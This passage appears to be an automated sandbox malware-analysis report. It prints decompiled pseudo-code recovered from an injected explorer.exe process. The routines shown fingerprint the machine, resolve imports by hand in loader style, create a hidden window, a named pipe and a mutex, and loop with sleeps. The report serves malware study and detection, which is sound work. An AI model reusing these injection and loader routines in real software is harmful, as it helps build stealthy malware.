                  										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                  										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                  											_t183 = 0x64;
                  											E0008E23E(_t183);
                  										}
                  										E000852C0( &_v1076, _t208);
                  										_t190 = _a8;
                  										_t154 = _t153;
                  										__eflags = _t190;
                  										if(_t190 != 0) {
                  											_t94 =  *0x9e688; // 0xb0000
                  											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                  											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                  												lstrcpyW(_t190, _t130);
                  											} else {
                  												_t96 = E0008109A(_t154, 0x228);
                  												_v1100 = _t96;
                  												lstrcpyW(_t190, _t96);
                  												E000885D5( &_v1100);
                  												 *_t203 = "\"";
                  												lstrcatW(_t190, ??);
                  												lstrcatW(_t190, _t130);
                  												lstrcatW(_t190, "\"");
                  											}
                  										}
                  										_t93 = _a12;
                  										__eflags = _t93;
                  										if(_t93 != 0) {
                  											 *_t93 = _v1104;
                  										}
                  										_t192 = 0;
                  										__eflags = 0;
                  										goto L41;
                  									}
                  									_t51 = _t91 + 0x228; // 0xb0228
                  									_t153 = _t51;
                  									L25:
                  									_t90 = E0008553F(_t153, _t130, __eflags);
                  									L26:
                  									__eflags = _t90;
                  									if(_t90 >= 0) {
                  										_t91 =  *0x9e688; // 0xb0000
                  										goto L32;
                  									}
                  									_push(0xfffffffd);
                  									L6:
                  									_pop(_t192);
                  									goto L41;
                  								}
                  							}
                  							_t106 = E0008C292(_v1104, __eflags);
                  							_v1112 = _t106;
                  							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                  							__eflags = _t108 - _t192;
                  							if(_t108 != _t192) {
                  								_t109 =  *0x9e684; // 0x40f8f0
                  								 *((intOrPtr*)(_t109 + 0x30))();
                  								E0008861A( &_v1116, _t192);
                  								_t145 = _t108;
                  								goto L17;
                  							}
                  							E0008861A( &_v1112, _t192);
                  							_t81 = 1;
                  							goto L42;
                  						}
                  						_t116 =  *(_t75 + 0x1898);
                  						__eflags = _t116 & 0x00000004;
                  						if((_t116 & 0x00000004) == 0) {
                  							__eflags = _t116;
                  							if(_t116 != 0) {
                  								goto L12;
                  							}
                  							L11:
                  							E0008E286(_v1112, _t175); // executed
                  							goto L12;
                  						}
                  						_v1080 = _v1080 & 0x00000000;
                  						_t118 = E000895E1(_t143, 0x879);
                  						_v1100 = _t118;
                  						_t175 = _t118;
                  						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                  						E000885D5( &_v1100);
                  						_t200 = _t200 + 0x14;
                  						goto L11;
                  					}
                  					_push(0xfffffffe);
                  					goto L6;
                  				} else {
                  					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                  					_t206 = _t122;
                  					if(_t122 == 0) {
                  						L41:
                  						_t81 = _t192;
                  						L42:
                  						return _t81;
                  					}
                  					goto L4;
                  				}
                  			}
                  0x00084cd8
                  0x00084cab
                  0x00084ae4
                  0x00084ae4
                  0x00000000
                  0x00084ae4
                  0x00084c8a
                  0x00084b69
                  0x00084b77
                  0x00084b8f
                  0x00084b95
                  0x00084b97
                  0x00084baf
                  0x00084bb4
                  0x00084bbd
                  0x00084bc3
                  0x00000000
                  0x00084bc3
                  0x00084b9f
                  0x00084ba8
                  0x00000000
                  0x00084ba8
                  0x00084b0b
                  0x00084b11
                  0x00084b13
                  0x00084b51
                  0x00084b53
                  0x00000000
                  0x00000000
                  0x00084b55
                  0x00084b59
                  0x00000000
                  0x00084b59
                  0x00084b15
                  0x00084b1f
                  0x00084b2b
                  0x00084b36
                  0x00084b3d
                  0x00084b47
                  0x00084b4c
                  0x00000000
                  0x00084b4c
                  0x00084ae2
                  0x00000000
                  0x00084a66
                  0x00084a71
                  0x00084a77
                  0x00084a79
                  0x00084d64
                  0x00084d64
                  0x00084d66
                  0x00084d6c
                  0x00084d6c
                  0x00000000
                  0x00084a79

                  APIs
                  • memset.MSVCRT ref: 00084A2D
                  • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
                  • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
                  • lstrcatW.KERNEL32 ref: 00084D3D
                  • lstrcatW.KERNEL32 ref: 00084D41
                  • lstrcatW.KERNEL32 ref: 00084D49
                  • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$CreateNamedPipememset
                  • String ID:
                  • API String ID: 2307407751-0
                  • Opcode ID: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
                  				long _v8;
                  				long _v12;
                  				WCHAR* _v16;
                  				short _v528;
                  				short _v1040;
                  				short _v1552;
                  				WCHAR* _t27;
                  				signed int _t29;
                  				void* _t33;
                  				long _t38;
                  				WCHAR* _t43;
                  				WCHAR* _t56;
                  
                  				_t44 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t43 = __edx;
                  				_t56 = __ecx;
                  				memset(__edx, 0, 0x100);
                  				_v12 = 0x100;
                  				GetComputerNameW( &_v528,  &_v12);
                  				lstrcpynW(_t43,  &_v528, 0x100);
                  				_t27 = E000895E1(_t44, 0xa88);
                  				_v16 = _t27;
                  				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                  				asm("sbb eax, eax");
                  				_v8 = _v8 &  ~_t29;
                  				E000885D5( &_v16);
                  				_t33 = E0008C392(_t43);
                  				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                  				lstrcatW(_t43, _t56);
                  				_t38 = E0008C392(_t43);
                  				_v12 = _t38;
                  				CharUpperBuffW(_t43, _t38);
                  				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                  			}
















                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                  • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
                  				intOrPtr _t11;
                  				long _t12;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				struct _OSVERSIONINFOA* _t29;
                  
                  				_push(__ecx);
                  				_t29 =  *0x9e688; // 0xb0000
                  				GetCurrentProcess();
                  				_t11 = E0008BA05(); // executed
                  				_t1 = _t29 + 0x1644; // 0xb1644
                  				_t25 = _t1;
                  				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                  				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                  				_t33 = _t12;
                  				if(_t12 != 0) {
                  					_t12 = E00088FBE(_t25, _t33);
                  				}
                  				_t3 = _t29 + 0x228; // 0xb0228
                  				 *(_t29 + 0x1854) = _t12;
                  				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                  				memset(_t29, 0, 0x9c);
                  				_t29->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t29);
                  				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                  				_t17 = E0008E3B6(_t3);
                  				_t7 = _t29 + 0x220; // 0xb0220
                  				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                  				_t18 = E0008E3F1(_t7); // executed
                  				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                  				return _t18;
                  			}









                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				signed int* _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				struct HINSTANCE__* _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				signed int _v64;
                  				signed int _t109;
                  				signed int _t112;
                  				signed int _t115;
                  				struct HINSTANCE__* _t121;
                  				void* _t163;
                  
                  				_v44 = _v44 & 0x00000000;
                  				if(_a4 != 0) {
                  					_v48 = GetModuleHandleA("kernel32.dll");
                  					_v40 = E0008E099(_v48, "GetProcAddress");
                  					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  					_v32 = _v52;
                  					_t109 = 8;
                  					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                  						L24:
                  						return 0;
                  					}
                  					_v56 = 0x80000000;
                  					_t112 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_v8 = _v8 + 0x14;
                  					}
                  					_t115 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                  						_v36 = _t121;
                  						if(_v36 != 0) {
                  							if( *_v8 == 0) {
                  								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                  							} else {
                  								_v12 =  *_v8 + _a4;
                  							}
                  							_v28 = _v28 & 0x00000000;
                  							while( *_v12 != 0) {
                  								_v24 = _v24 & 0x00000000;
                  								_v16 = _v16 & 0x00000000;
                  								_v64 = _v64 & 0x00000000;
                  								_v20 = _v20 & 0x00000000;
                  								if(( *_v12 & _v56) == 0) {
                  									_v60 =  *_v12 + _a4;
                  									_v20 = _v60 + 2;
                  									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                  									_v16 = _v40(_v36, _v20);
                  								} else {
                  									_v24 =  *_v12;
                  									_v20 = _v24 & 0x0000ffff;
                  									_v16 = _v40(_v36, _v20);
                  								}
                  								if(_v24 != _v16) {
                  									_v44 = _v44 + 1;
                  									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                  										 *_v12 = _v16;
                  									} else {
                  										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                  									}
                  								}
                  								_v12 =  &(_v12[1]);
                  								_v28 = _v28 + 4;
                  							}
                  							_v8 = _v8 + 0x14;
                  							continue;
                  						}
                  						_t163 = 0xfffffffd;
                  						return _t163;
                  					}
                  					goto L24;
                  				}
                  				return __eax | 0xffffffff;
                  			}
























                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  C-Code - Quality: 96%
                  			E00082EDA(void* __eflags) {
                  				CHAR* _v12;
                  				struct HINSTANCE__* _v32;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				void _v52;
                  				char _v80;
                  				char _v144;
                  				intOrPtr _t25;
                  				intOrPtr _t32;
                  				struct HWND__* _t34;
                  				intOrPtr _t36;
                  				intOrPtr _t39;
                  				struct HWND__* _t44;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				void* _t51;
                  				intOrPtr _t53;
                  				intOrPtr _t56;
                  				intOrPtr _t59;
                  				struct HINSTANCE__* _t64;
                  
                  				_t25 =  *0x9e684; // 0x40f8f0
                  				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                  				memset( &_v52, 0, 0x30);
                  				_t59 =  *0x9e688; // 0xb0000
                  				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                  				_v48 = 3;
                  				_v52 = 0x30;
                  				_v12 =  &_v144;
                  				_v44 = E00082E77;
                  				_push( &_v52);
                  				_t32 =  *0x9e694; // 0x40fa48
                  				_v32 = _t64;
                  				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                  					L6:
                  					_t34 =  *0x9e718; // 0x50056
                  					if(_t34 != 0) {
                  						_t39 =  *0x9e694; // 0x40fa48
                  						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                  					}
                  					L8:
                  					_t36 =  *0x9e694; // 0x40fa48
                  					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                  					return 0;
                  				}
                  				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                  				 *0x9e718 = _t44;
                  				if(_t44 == 0) {
                  					goto L8;
                  				}
                  				ShowWindow(_t44, 0);
                  				_t47 =  *0x9e694; // 0x40fa48
                  				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                  				while(1) {
                  					_t50 =  *0x9e694; // 0x40fa48
                  					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                  					if(_t51 == 0) {
                  						goto L6;
                  					}
                  					if(_t51 == 0xffffffff) {
                  						goto L6;
                  					}
                  					_t53 =  *0x9e694; // 0x40fa48
                  					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                  					_t56 =  *0x9e694; // 0x40fa48
                  					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                  				}
                  				goto L6;
                  			}
























                  APIs
                  • memset.MSVCRT ref: 00082EF9
                  • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                  • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Window$CreateShowmemset
                  • String ID: 0
                  • API String ID: 3027179219-4108050209
                  • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                  • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 78%
                  			E00085631(void* __edx, void* __edi) {
                  				char _v44;
                  				void* _t8;
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				void* _t20;
                  				void* _t33;
                  				void* _t34;
                  				void* _t36;
                  				void* _t39;
                  				void* _t40;
                  				void* _t49;
                  				void* _t54;
                  
                  				_t54 = __edi;
                  				_t8 = E00089E66(0x3b); // executed
                  				if(_t8 != 0xffffffff) {
                  					L2:
                  					E0008980C(0x9e6c8);
                  					_t39 = 0x37; // executed
                  					E00089F06(_t39);
                  					_t11 =  *0x9e688; // 0xb0000
                  					_t40 = 0x3a; // executed
                  					E00089F06(_t40); // executed
                  					E0008E4C1(_t63);
                  					_t14 =  *0x9e688; // 0xb0000
                  					_t41 =  &_v44;
                  					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                  					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                  					_t17 =  *0x9e684; // 0x40f8f0
                  					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                  					 *0x9e74c = _t18;
                  					if(_t18 != 0) {
                  						_t20 = CreateMutexA(0, 0, 0);
                  						 *0x9e76c = _t20;
                  						__eflags = _t20;
                  						if(_t20 != 0) {
                  							_t34 = E00088604(0x1000);
                  							_t52 = 0;
                  							 *0x9e770 = _t34;
                  							_t49 =  *0x9e774; // 0x2
                  							__eflags = _t34;
                  							_t41 =  !=  ? 0 : _t49;
                  							__eflags = _t41;
                  							 *0x9e774 = _t41; // executed
                  						}
                  						E0008153B(_t41, _t52); // executed
                  						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                  						E00083017(); // executed
                  						E000831C2(0, __eflags); // executed
                  						E000829B1(); // executed
                  						E00083BB2(_t54, __eflags); // executed
                  						while(1) {
                  							__eflags =  *0x9e758; // 0x0
                  							if(__eflags != 0) {
                  								break;
                  							}
                  							E0008980C(0x9e750);
                  							_push(0x9e750);
                  							_push(0x9e750); // executed
                  							E0008279B();
                  							Sleep(0xfa0);
                  						}
                  						E00083D34();
                  						E00089A8E();
                  						E000834CB();
                  						_t33 = 0;
                  						__eflags = 0;
                  					} else {
                  						goto L3;
                  					}
                  				} else {
                  					_t36 = E00082DCB();
                  					_t63 = _t36;
                  					if(_t36 != 0) {
                  						L3:
                  						_t33 = 1;
                  					} else {
                  						goto L2;
                  					}
                  				}
                  				return _t33;
                  			}


















                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: 3mNa$mNa
                  • API String ID: 3249252070-772915308
                  • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                  • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                  • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                  • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                  				char _v516;
                  				char _v556;
                  				char _v564;
                  				char _v568;
                  				char _v572;
                  				char _v576;
                  				intOrPtr _v580;
                  				char _v588;
                  				signed int _v596;
                  				intOrPtr _v602;
                  				intOrPtr _v604;
                  				char _v608;
                  				CHAR* _v612;
                  				CHAR* _v616;
                  				signed int _v620;
                  				signed int _v624;
                  				signed int _v628;
                  				signed int _v632;
                  				char _v636;
                  				intOrPtr _t119;
                  				void* _t120;
                  				signed int _t122;
                  				intOrPtr _t123;
                  				CHAR* _t124;
                  				intOrPtr _t125;
                  				CHAR* _t127;
                  				WCHAR* _t130;
                  				intOrPtr _t133;
                  				intOrPtr _t137;
                  				WCHAR* _t138;
                  				intOrPtr _t142;
                  				WCHAR* _t143;
                  				CHAR* _t144;
                  				intOrPtr _t145;
                  				intOrPtr _t150;
                  				intOrPtr _t153;
                  				WCHAR* _t154;
                  				signed int _t159;
                  				WCHAR* _t160;
                  				intOrPtr _t163;
                  				intOrPtr _t165;
                  				intOrPtr _t166;
                  				intOrPtr _t170;
                  				signed int _t173;
                  				signed int _t178;
                  				intOrPtr _t182;
                  				WCHAR* _t184;
                  				char _t186;
                  				WCHAR* _t188;
                  				intOrPtr _t200;
                  				intOrPtr _t211;
                  				signed int _t215;
                  				char _t220;
                  				WCHAR* _t231;
                  				intOrPtr _t235;
                  				intOrPtr _t238;
                  				intOrPtr _t239;
                  				intOrPtr _t246;
                  				signed int _t248;
                  				WCHAR* _t249;
                  				CHAR* _t250;
                  				intOrPtr _t262;
                  				void* _t271;
                  				intOrPtr _t272;
                  				signed int _t277;
                  				void* _t278;
                  				intOrPtr _t280;
                  				signed int _t282;
                  				void* _t298;
                  				void* _t299;
                  				intOrPtr _t305;
                  				CHAR* _t326;
                  				void* _t328;
                  				WCHAR* _t329;
                  				intOrPtr _t331;
                  				WCHAR* _t333;
                  				signed int _t335;
                  				intOrPtr* _t337;
                  				void* _t338;
                  				void* _t339;
                  				void* _t353;
                  
                  				_t353 = __fp0;
                  				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                  				_t119 =  *0x9e688; // 0xb0000
                  				_v620 = _v620 & 0x00000000;
                  				_t328 = __ecx;
                  				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                  					L7:
                  					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                  					_t14 = _t120 + 1; // 0x1
                  					E0008A86D( &_v556, _t14, _t351);
                  					_t298 = 0x64;
                  					_t122 = E0008A471( &_v556, _t298);
                  					 *0x9e748 = _t122;
                  					if(_t122 != 0) {
                  						_push(0x4e5);
                  						_t299 = 0x10;
                  						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                  						 *0x9e680 = _t123;
                  						 *_t337 = 0x610;
                  						_t124 = E000895E1(0x9b9cc);
                  						_push(0);
                  						_push(_t124);
                  						_v612 = _t124;
                  						_t125 =  *0x9e688; // 0xb0000
                  						_t127 = E000892E5(_t125 + 0x228);
                  						_t338 = _t337 + 0xc;
                  						_v616 = _t127;
                  						E000885D5( &_v612);
                  						_t130 = E0008B269(_t127);
                  						_t246 = 3;
                  						__eflags = _t130;
                  						if(_t130 != 0) {
                  							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                  							 *_t328 = _t246;
                  						}
                  						E0008861A( &_v616, 0xfffffffe);
                  						_t133 =  *0x9e688; // 0xb0000
                  						_t22 = _t133 + 0x114; // 0xb0114
                  						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                  						_t262 =  *0x9e688; // 0xb0000
                  						_t339 = _t338 + 0x14;
                  						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                  						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                  							L17:
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							_v572 = _t328;
                  							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                  							_t137 =  *0x9e680; // 0x40fda0
                  							_t138 =  *(_t137 + 8);
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                  							}
                  							_v620 = _v620 & 0x00000000;
                  							E0008E2C6(_t353,  &_v576); // executed
                  							_pop(_t262);
                  							_t142 =  *0x9e6b4; // 0x40fa98
                  							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                  							__eflags = _t143;
                  							if(_t143 == 0) {
                  								E0008E2C6(_t353,  &_v588);
                  								_t235 =  *0x9e6b4; // 0x40fa98
                  								_pop(_t262);
                  								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                  							}
                  							__eflags =  *0x9e73c;
                  							if( *0x9e73c <= 0) {
                  								goto L36;
                  							} else {
                  								_t165 =  *0x9e680; // 0x40fda0
                  								__eflags =  *(_t165 + 8);
                  								if( *(_t165 + 8) != 0) {
                  									_t231 =  *(_t165 + 0xc);
                  									__eflags = _t231;
                  									if(_t231 != 0) {
                  										 *_t231(_v580);
                  									}
                  								}
                  								_t166 =  *0x9e688; // 0xb0000
                  								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                  								__eflags = _t262 - _t246;
                  								if(_t262 == _t246) {
                  									goto L36;
                  								} else {
                  									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                  									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                  										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                  										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                  											E000849A5();
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											_t170 =  *0x9e684; // 0x40f8f0
                  											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                  											_t262 = _v602;
                  											_t248 = 0x3c;
                  											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                  											_v596 = _t173;
                  											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                  											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                  											_v624 = _t178;
                  											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                  											_t182 =  *0x9e688; // 0xb0000
                  											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                  											_t339 = _t339 + 0xc;
                  											__eflags = _t184;
                  											if(_t184 >= 0) {
                  												_t333 = E00088604(0x1000);
                  												_v616 = _t333;
                  												_pop(_t262);
                  												__eflags = _t333;
                  												if(_t333 != 0) {
                  													_t186 = E0008109A(_t262, 0x148);
                  													_t305 =  *0x9e688; // 0xb0000
                  													_v636 = _t186;
                  													_push(_t305 + 0x648);
                  													_push(0xa);
                  													_push(7);
                  													_t271 = 2;
                  													E0008902D(_t271,  &_v572);
                  													_t272 =  *0x9e688; // 0xb0000
                  													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                  													_t339 = _t339 + 0x18;
                  													_v632 = _t188;
                  													__eflags = _t188;
                  													if(_t188 != 0) {
                  														_push(_v624 % _t248 & 0x0000ffff);
                  														_push(_v628 & 0x0000ffff);
                  														_push(_v596 % _t248 & 0x0000ffff);
